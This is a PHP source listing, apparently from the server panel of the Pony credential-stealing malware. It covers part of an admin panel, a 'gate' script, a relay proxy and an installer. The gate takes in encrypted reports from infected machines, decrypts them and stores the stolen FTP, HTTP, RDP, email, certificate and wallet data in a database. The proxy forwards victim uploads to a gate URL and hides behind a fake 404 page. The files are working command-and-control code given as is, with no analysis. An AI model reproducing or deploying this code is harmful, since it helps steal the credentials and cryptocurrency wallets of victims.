1679. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1680. } else if ($admin_routine == 'change_password')
1681. {
1682. $current_password = trim(assign($_REQUEST['current_password']));
1683. $new_password = trim(assign($_REQUEST['new_password']));
1684. $confirm_password = trim(assign($_REQUEST['confirm_password']));
1685.  
1686. if ($pony_db->check_password($current_password))
1687. {
1688. if ($new_password == $confirm_password)
1689. {
1690. if (strlen($new_password))
1691. {
1692. if ($pony_db->change_password($new_password))
1693. show_smarty_success($smarty);
1694. else
1695. show_smarty_error($smarty, '', '?action=admin&amp;routine=change_pass_form');
1696. } else
1697. show_smarty_error($smarty, 'ERR_EMPTY_PASSWORD', '?action=admin&amp;routine=change_pass_form');
1698. } else
1699. show_smarty_error($smarty, 'ERR_PASSWORD_MISMATCH', '?action=admin&amp;routine=change_pass_form');
1700. } else
1701. show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '?action=admin&amp;routine=change_pass_form');
1702. }
1703.  
1704. if ($admin_routine == 'edit_form')
1705. {
1706. $user_id = trim(assign($_REQUEST['user_id']));
1707. if ($pony_db->priv_is_admin())
1708. {
1709. $user_data = $pony_db->get_user_data($user_id);
1710. if (is_array($user_data) && $user_data && $pony_db->priv_is_user($user_data['privileges']))
1711. {
1712. $smarty->assign('user_data', $user_data);
1713. }
1714. }
1715. }
1716.  
1717. $user_list = array();
1718. if ($pony_db->priv_is_admin())
1719. {
1720. $pony_db->get_user_list($user_list);
1721. $smarty->assign('report_password', $pony_db_report_password);
1722.  
1723. $smarty->assign('sftp_user', assign($pony_report_options['sftp_user']));
1724. $smarty->assign('sftp_port', assign($pony_report_options['sftp_port']));
1725. $smarty->assign('sftp_protocol', assign($pony_report_options['sftp_protocol']));
1726. }
1727.  
1728. $smarty->assign('user_list', $user_list);
1729. $smarty->display('management.tpl');
1730. }
1731. else if ($admin_action == 'help')
1732. {
1733. // ---------------------------------------------------------------------------------------
1734. // Help contents
1735.  
1736. $module_names = array();
1737.  
1738. foreach ($global_module_list as $module)
1739. {
1740. array_push($module_names, $module[2]);
1741. }
1742. $smarty->assign('module_names', $module_names);
1743. $smarty->display("help.tpl");
1744. }
1745. else if (strlen($admin_action) == 0)
1746. {
1747. // ---------------------------------------------------------------------------------------
1748. // Home page
1749. // Installation Check
1750. if (!install_check(false, false))
1751. {
1752. show_smarty_error($smarty, 'ERR_SRV_CONFIGURATION');
1753. echo '<div id="achtung" style="margin-bottom:20px">';
1754. install_check(true, true);
1755. echo '</div>';
1756. }
1757.  
1758. // Latest logins
1759. $latest_login_list = array();
1760. $pony_db->get_login_log($latest_login_list, 5);
1761.  
1762. foreach ($latest_login_list as $login_key=>$login_item)
1763. {
1764. $latest_login_list[$login_key]['country_code'] = geo_ip_country_code($login_item['ip']);
1765. $latest_login_list[$login_key]['country_name'] = geo_ip_country_name($login_item['ip']);
1766. }
1767.  
1768. $smarty->assign("login_list", $latest_login_list);
1769.  
1770. // Domains
1771. $domain_list = array();
1772. $pony_db->get_domains($domain_list);
1773.  
1774. smarty_assign_common_vars($smarty, $pony_db);
1775. $smarty->assign("domain_list", $domain_list);
1776.  
1777. $smarty->display("home.tpl");
1778. }
1779.  
1780. $smarty->display('footer.tpl');
1781. $smarty->unloadFilter('output', 'trimwhitespace');
1782. $smarty->display('stopwatch.tpl');
1783.  
1784.  
1785. ------
1786. <?php
1787.  
1788. // turn off all error reporting
1789. error_reporting(0);
1790. @set_time_limit(0);
1791. @ini_set('max_execution_time', 0);
1792.  
1793. // make sure included files do not generate extra output
1794. ob_start();
1795.  
1796. if (!isset($proxy_config))
1797. {
1798. // use local config file
1799. $config_file = "config.php";
1800. } else
1801. {
1802. // use proxy config file
1803. $config_file = $proxy_config;
1804. }
1805.  
1806. file_exists($config_file) or die();
1807.  
1808. require_once($config_file);
1809. require_once('includes/misc.php');
1810. require_once('includes/password_modules.php');
1811. require_once('includes/database.php');
1812.  
1813. // clean output buffer
1814. ob_end_clean();
1815.  
1816. // connect and validate database
1817. $pony_db = new pony_db();
1818. $pony_db->connect_db($mysql_host, $mysql_user, $mysql_pass, $mysql_database, false);
1819.  
1820. // set report decryption password
1821. $pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);
1822. // set report parsing options
1823. $pony_report_options = array('sftp_user' => $pony_db->get_option('sftp_user', '', '1'),
1824. 'sftp_port' => $pony_db->get_option('sftp_port', '', '1'),
1825. 'sftp_protocol' => $pony_db->get_option('sftp_protocol', '', '1'));
1826.  
1827. // default values for unset config variables
1828. if (!isset($enable_http_mode))
1829. $enable_http_mode = false;
1830. if (!isset($enable_email_mode))
1831. $enable_email_mode = false;
1832.  
1833. // client IP
1834. $ip = get_client_ip();
1835.  
1836. // get report data
1837. $real_length = intval($_SERVER['CONTENT_LENGTH']);
1838. $received_report_data = file_get_contents('php://input');
1839.  
1840. // check if data was received in full
1841. if ($real_length !== strlen($received_report_data))
1842. die();
1843.  
1844. $report_id = 0;
1845.  
1846. // report data length should be inbetween 12 bytes and 900 Kb (default mysql query max. length)
1847. $max_db_len_size = 1024*900;
1848. if (strlen($received_report_data) > 12 && strlen($received_report_data) <= $max_db_len_size)
1849. {
1850. if (report_parser::verify_report_file_header($received_report_data))
1851. {
1852. $report_status_ok = false;
1853. $ip_country = geo_ip_country_code($ip);
1854. $report_new_encryption = false;
1855.  
1856. // check if new random encryption is used
1857. if (report_parser::verify_new_file_header($received_report_data))
1858. {
1859. $report_new_encryption = true;
1860. }
1861.  
1862. if (report_parser::check_report_crypted_header($received_report_data) || report_parser::verify_new_file_header($received_report_data))
1863. {
1864. // try to pre-decrypt report data
1865. report_parser::pre_decrypt_report($received_report_data, $pony_db_report_password);
1866. }
1867.  
1868. // add non parsed report
1869. $report_id = $pony_db->add_nonparsed_report($ip, $ip_country, $received_report_data);
1870.  
1871. if ($report_id)
1872. {
1873. // there's new report available for parsing
1874. $report = new report_parser($pony_report_options);
1875.  
1876. // process report
1877. ob_start(); // detect report processing noise
1878. error_reporting(E_ALL);
1879. $parse_result = $report->process_report($received_report_data, $pony_db_report_password);
1880. $ob_data = trim(ob_get_contents());
1881. error_reporting(0);
1882. ob_end_clean();
1883.  
1884. if ($parse_result)
1885. {
1886. $report_status_ok = true;
1887.  
1888. if ($enable_http_mode)
1889. $url_list_array = array_merge($report->ftp_lines, $report->http_lines);
1890. else
1891. $url_list_array = $report->ftp_lines;
1892.  
1893. $url_list_array = array_merge($url_list_array, $report->rdp_lines);
1894.  
1895. if ($enable_email_mode)
1896. {
1897. $email_lines = $report->email_lines;
1898. }
1899. else
1900. {
1901. $email_lines = null;
1902. }
1903.  
1904. $pony_db->update_parsed_report($report_id, $report->report_os_name, $report->report_is_win64, $report->report_is_admin,
1905. $report->report_hwid, $report->report_version_id, $url_list_array, $report->log->log_lines, $report->cert_lines, $report->wallet_lines, $email_lines);
1906.  
1907. if (strlen($ob_data))
1908. {
1909. $pony_db->add_log_line('ERR_EXTRA_NOISE: '.$ob_data, CLOG_SOURCE_REPORT, $report_id, $log_extra);
1910. }
1911. } else
1912. {
1913. // parse error, write logs
1914. $log = $report->log->log_lines;
1915. $pony_db->import_log_list($log, CLOG_SOURCE_REPORT, $report_id);
1916. }
1917. } else if ($pony_db->state)
1918. {
1919. $report_status_ok = true;
1920. $pony_db->add_log_line('NOTIFY_GATE_DUPLICATE_REPORT', CLOG_SOURCE_GATE, null, $ip);
1921. }
1922.  
1923. // check report parsing state and return success status for the client
1924. if ($report_status_ok)
1925. {
1926. $response_msg = 'STATUS-IMPORT-OK';
1927. if ($report_new_encryption)
1928. $response_msg = rc4_rand_crypt($response_msg);
1929. echo $response_msg;
1930. }
1931. }
1932. } else
1933. {
1934. if (strlen($received_report_data) == 0)
1935. {
1936. // received empty report
1937. // return 404
1938. $pony_db->add_log_line('NOTIFY_GATE_RECEIVED_NULL_REPORT', CLOG_SOURCE_GATE, null, $ip);
1939. header('HTTP/1.0 404 Not Found');
1940. header('Status: 404 Not Found');
1941. $_SERVER['REDIRECT_STATUS'] = 404;
1942. if (file_exists('404.html'))
1943. echo file_get_contents('404.html');
1944. die();
1945. }
1946. else if (strlen($received_report_data) < 12 && strlen($received_report_data) > 1)
1947. $pony_db->add_log_line('ERR_GATE_REPORT_WRONG_SIZE: '.strlen($received_report_data), CLOG_SOURCE_GATE, null, $ip);
1948. else if (strlen($received_report_data) > $max_db_len_size)
1949. $pony_db->add_log_line('ERR_GATE_REPORT_BIG_SIZE: '.strlen($received_report_data), CLOG_SOURCE_GATE, null, $ip);
1950. }
1951.  
1952.  
1953. ----
1954. <?php
1955.  
1956. $redirect_url = "http://192.168.1.101/gate.php"; // redirect URL (should point to the gate script)
1957.  
1958.  
1959.  
1960.  
1961.  
1962.  
1963. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
1964.  
1965. error_reporting(0);
1966. set_time_limit(0);
1967. ini_set('max_execution_time', 0);
1968.  
1969. // check if curl is installed
1970. $loaded_extensions = get_loaded_extensions();
1971.  
1972. if (array_search('curl', $loaded_extensions) === false)
1973. die();
1974.  
1975. // check if data was received in full
1976. $real_length = intval($_SERVER['CONTENT_LENGTH']);
1977. $received_report_data = file_get_contents('php://input');
1978.  
1979. if ($real_length !== strlen($received_report_data))
1980. die();
1981.  
1982. // extract host from redirect url
1983. if (substr($redirect_url, 0, 4) != 'http')
1984. $redirect_url = 'http://'.$redirect_url;
1985.  
1986. $redirect_host = @parse_url($redirect_url, PHP_URL_HOST);
1987.  
1988. function my_upload($ch, $fp, $len)
1989. {
1990. static $pos=0; // keep track of position
1991. $post_data = file_get_contents('php://input');
1992.  
1993. $data = substr($post_data, $pos, $len);
1994. $pos += strlen($data);
1995. return $data;
1996. }
1997.  
1998. function curl_load($url, &$data, $headers)
1999. {
2000. clearstatcache();
2001.  
2002. $return = false;
2003. $url = trim($url);
2004.  
2005. if (substr($url, 0, 4) != 'http') $url = 'http://'.$url;
2006.  
2007. $ch = curl_init($url);
2008.  
2009. if (!$ch)
2010. return false;
2011.  
2012. curl_setopt($ch, CURLOPT_HEADER, true);
2013. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2014. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
2015. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
2016. curl_setopt($ch, CURLOPT_FAILONERROR, true);
2017. curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
2018. curl_setopt($ch, CURLOPT_DNS_USE_GLOBAL_CACHE, false);
2019. curl_setopt($ch, CURLOPT_POST, true);
2020.  
2021. array_push($headers, 'Accept-Encoding: identity, *;q=0');
2022. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
2023.  
2024. $post_data = file_get_contents('php://input');
2025. if (strlen($post_data))
2026. {
2027. curl_setopt($ch, CURLOPT_READFUNCTION, 'my_upload');
2028. }
2029.  
2030. $curl_execute_result = @curl_exec($ch);
2031.  
2032. // Check if any error occurred
2033. if (!curl_errno($ch))
2034. {
2035. $data = $curl_execute_result;
2036. $return = true;
2037. } else
2038. {
2039. $data = '';
2040. $return = false;
2041. }
2042. curl_close($ch);
2043.  
2044. return $return;
2045. }
2046.  
2047. function parse_lines($value)
2048. {
2049. return preg_split("/((\r(?!\n))|((?<!\r)\n)|(\r\n))/", $value);
2050. }
2051.  
2052. $original_query = trim(@parse_url($redirect_url, PHP_URL_QUERY));
2053.  
2054. if (!strlen($original_query))
2055. $query_string = '?';
2056. else
2057. $query_string = '&';
2058.  
2059. $query_string .= $_SERVER['QUERY_STRING'];
2060. $query_string .= '&pass_ip='.$_SERVER['REMOTE_ADDR'];
2061.  
2062. $data = '';
2063. $headers = getallheaders();
2064. $curl_headers_array = array();
2065.  
2066. foreach ($headers as $name=>$value)
2067. {
2068. if (strtolower($name) == 'accept-encoding' || strtolower($name) == 'connection')
2069. {
2070. }
2071. elseif (strtolower($name) == 'host')
2072. {
2073. array_push($curl_headers_array, $name.': '.$redirect_host);
2074. } else
2075. {
2076. array_push($curl_headers_array, $name.': '.$value);
2077. }
2078. }
2079.  
2080. if (!curl_load($redirect_url.$query_string, $data, $curl_headers_array))
2081. {
2082. header("HTTP/1.0 404 Not Found");
2083. header("Status: 404 Not Found");
2084. $_SERVER['REDIRECT_STATUS'] = 404;
2085. if (file_exists('404.html'))
2086. echo file_get_contents('404.html');
2087. die();
2088. }
2089.  
2090. $headers_end_pos = strpos($data, "\r\n\r\n");
2091. $data_start_pos = $headers_end_pos+4;
2092. if ($headers_end_pos === false)
2093. {
2094. $headers_end_pos = strpos($data, "\n\n");
2095. $data_start_pos = $headers_end_pos+2;
2096. }
2097.  
2098. if ($headers_end_pos !== false)
2099. {
2100. $lines = parse_lines(substr($data, 0, $headers_end_pos));
2101. foreach ($lines as $line)
2102. {
2103. // do not pass "Transfer-Encoding: chunked" header
2104. if (stripos($line, 'Transfer-Encoding') === false)
2105. {
2106. header($line."\r\n");
2107. }
2108. }
2109.  
2110. die(substr($data, $data_start_pos));
2111. } else
2112. {
2113. die($data);
2114. }
2115.  
2116.  
2117.  
2118. -----
2119.  
2120. <?php
2121.  
2122. error_reporting(E_ALL);
2123.  
2124. // make sure included files do not generate extra output
2125. ob_start();
2126.  
2127. if (!isset($proxy_config))
2128. {
2129. // use local config file
2130. $config_file = "config.php";
2131. } else
2132. {
2133. // use proxy config file
2134. $config_file = $proxy_config;
2135. }
2136.  
2137. if (!file_exists($config_file))
2138. {
2139. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
2140. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
2141. echo 'Missing configuration file `<b>'.$config_file.'</b>`.';
2142. echo '</div>';
2143. die();
2144. }
2145.  
2146. require_once($config_file);
2147. require_once("includes/misc.php");
2148. require_once("includes/password_modules.php");
2149. require_once("includes/database.php");
2150.  
2151. // clean output buffer
2152. ob_end_clean();
2153.  
2154. $pony_db = new pony_db();
2155.  
2156. if (!$pony_db->connect($mysql_host, $mysql_user, $mysql_pass))
2157. {
2158. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
2159. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
2160. echo 'Cannot connect to mysql database, check settings in configuration file `<b>config.php</b>`.<br />';
2161. echo 'MySQL error: '.mysql_error();
2162. echo '</div>';
2163. die();
2164. }
2165.  
2166. if (!$pony_db->select_db($mysql_database))
2167. {
2168. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
2169. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
2170. echo('Cannot select mysql database, please, check if the `<b>'.$mysql_database.'</b>` database exists or you have enough rights to create new databases.<br />');
2171. echo 'MySQL error: '.mysql_error().'.';
2172. echo '</div>';
2173. die();
2174. }
2175.  
2176. $all_tables_exist = $pony_db->all_tables_exist();
2177. $some_tables_exist = $pony_db->some_tables_exist();
2178.  
2179. if (!$pony_db->state)
2180. {
2181. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
2182. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
2183. echo 'Unknown MySQL error occured: '.mysql_error().'.';
2184. echo '</div>';
2185. die();
2186. }
2187.  
2188. if (!install_check(false, true))
2189. {
2190. echo '<h4><font color="#b72525">Attention! Server configuration problem!</font></h4>';
2191. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
2192. install_check(true, true);
2193. echo '</div>';
2194. }
2195.  
2196. $set_admin_pass = trim(assign($_REQUEST['set_admin_pass'])) == '1';
2197.  
2198. if (!$all_tables_exist && $set_admin_pass)
2199. {
2200. $admin_login = trim(assign($_REQUEST['login']));
2201. $admin_pass = trim(assign($_REQUEST['password']));
2202. $admin_pass_verify = trim(assign($_REQUEST['confirm_password']));
2203.  
2204. if (!$admin_login)
2205. {
2206. die("Empty login names are now allowed!<br /><a href=\"".$_SERVER['SCRIPT_NAME']."\">Go back and try again</a>.");
2207. }
2208.  
2209. if (!$admin_pass)
2210. {
2211. die("Empty passwords are now allowed!<br /><a href=\"".$_SERVER['SCRIPT_NAME']."\">Go back and try again</a>.");
2212. }
2213.  
2214. if ($admin_pass != $admin_pass_verify)
2215. {
2216. die("Admin and confirm passwords mismatch!<br /><a href=\"".$_SERVER['SCRIPT_NAME']."\">Go back and try again</a>.");
2217. }
2218.  
2219. if ($pony_db->create_tables() && $pony_db->add_user($admin_login, $admin_pass, 'admin_all'))
2220. {
2221. echo "Installation complete!<br />";
2222. echo "<a href=\"".htmlspecialchars(str_replace("setup", "admin", $_SERVER['SCRIPT_NAME']), ENT_QUOTES, 'cp1251')."\">Proceed to administration panel</a>.";
2223. } else
2224. {
2225. die("Installation failed: `<b>".mysql_error()."</b>`");
2226. }
2227. die();
2228. }
2229.  
2230. if (!$all_tables_exist)
2231. {
2232. if ($some_tables_exist && trim(assign($_REQUEST['delete_tables']) == '1'))
2233. {
2234. $pony_db->delete_tables();
2235. $some_tables_exist = $pony_db->some_tables_exist();
2236. }
2237.  
2238. if ($some_tables_exist)
2239. {
2240. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
2241. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
2242. echo 'Missing required MySQL tables. Please, delete Pony MySQL tables and try again.<br />';
2243. echo '</div>';
2244. echo '<a href="'.$_SERVER['SCRIPT_NAME'].'?delete_tables=1">Delete Pony MySQL tables and restart installation process</a>.';
2245. die();
2246. }
2247.  
2248. die ("MySQL database installation. Please, provide administrator credentials:<table>".
2249. "<form action=\"".$_SERVER['SCRIPT_NAME']."\" method=\"post\">".
2250. "<input type=\"hidden\" name=\"set_admin_pass\" value=\"1\">".
2251. "<tr><td>Admin login: </td><td><input type=\"text\" name=\"login\"></td></tr>".
2252. "<tr><td>Admin password: </td><td><input type=\"password\" name=\"password\"></td></tr>".
2253. "<tr><td>Confirm password: </td><td><input type=\"password\" name=\"confirm_password\"></td></tr><br />".
2254. "<tr><td colspan=2 align=right><input type=\"submit\" value=\"Install\"></td></tr>".
2255. "</form>".
2256. "</table>");
2257. } else
2258. {
2259. die('Installation complete!<br />'.
2260. "<a href=\"".htmlspecialchars(str_replace("setup", "admin", $_SERVER['SCRIPT_NAME']), ENT_QUOTES, 'cp1251')."\">Proceed to administration panel</a>.".
2261. '<br /><br />To restart installation process, please, delete MySQL tables.<br />'
2262. );
2263.  
2264. }